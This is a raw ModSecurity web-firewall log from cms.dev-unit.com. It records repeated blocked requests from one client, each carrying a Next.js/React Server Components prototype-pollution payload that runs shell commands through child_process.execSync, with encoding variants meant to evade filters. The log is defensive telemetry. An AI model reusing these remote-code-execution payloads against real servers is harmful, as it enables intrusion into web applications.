(phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzCLbhFL16Wsx-C9DAQAAAZQ"] [Sun Apr 05 15:42:36.167667 2026] [:error] [pid 1503:tid 1520] [client 172.94.9.253:42502] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzEI7AjfUQYCN-J7DmAAAAMs"] [Sun Apr 05 15:42:36.168758 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:42548] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmzJc83uMXRUE9zvQS5AAAAcE"] [Sun Apr 05 15:42:36.169321 2026] [:error] [pid 23077:tid 23102] [client 172.94.9.253:42512] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmzJc83uMXRUE9zvQS4wAAAdM"] [Sun Apr 05 15:42:36.169847 2026] [:error] [pid 23077:tid 23098] [client 172.94.9.253:42526] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzJc83uMXRUE9zvQS5QAAAc8"] [Sun Apr 05 15:42:36.169878 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:42486] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmzJc83uMXRUE9zvQS5gAAAdc"] [Sun Apr 05 15:42:36.172715 2026] [:error] [pid 1503:tid 1512] [client 172.94.9.253:42532] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzEI7AjfUQYCN-J7DmwAAAMM"] [Sun Apr 05 15:42:36.186028 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:42536] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmzLxQSOrq_iRTM7dpoQAAAQM"] [Sun Apr 05 15:42:36.287948 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:42562] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzJc83uMXRUE9zvQS5wAAAcs"] [Sun Apr 05 15:42:36.291662 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:42586] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzLxQSOrq_iRTM7dpowAAAQY"] [Sun Apr 05 15:42:36.292445 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:42558] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzLxQSOrq_iRTM7dppAAAARA"] [Sun Apr 05 15:42:36.294816 2026] [:error] [pid 1503:tid 1519] [client 172.94.9.253:42636] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzEI7AjfUQYCN-J7DnQAAAMo"] [Sun Apr 05 15:42:36.297581 2026] [:error] [pid 23077:tid 23100] [client 172.94.9.253:42624] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzJc83uMXRUE9zvQS6gAAAdE"] [Sun Apr 05 15:42:36.297592 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:42600] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzJc83uMXRUE9zvQS6QAAAco"] [Sun Apr 05 15:42:36.298230 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:42576] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzLxQSOrq_iRTM7dppQAAAQ0"] [Sun Apr 05 15:42:36.303841 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:42594] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzJc83uMXRUE9zvQS6wAAAc0"] [Sun Apr 05 15:42:36.305094 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:42614] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzLxQSOrq_iRTM7dppgAAAQQ"] [Sun Apr 05 15:42:36.307354 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:42642] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzLxQSOrq_iRTM7dppwAAAQ4"] [Sun Apr 05 15:42:36.384944 2026] [:error] [pid 1308:tid 1355] [client 172.94.9.253:43118] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzCj-HYEhJWFlG6ErhQAAAEo"] [Sun Apr 05 15:42:36.385008 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:43158] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzLxQSOrq_iRTM7dpqAAAAQQ"] [Sun Apr 05 15:42:36.386990 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:43156] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match 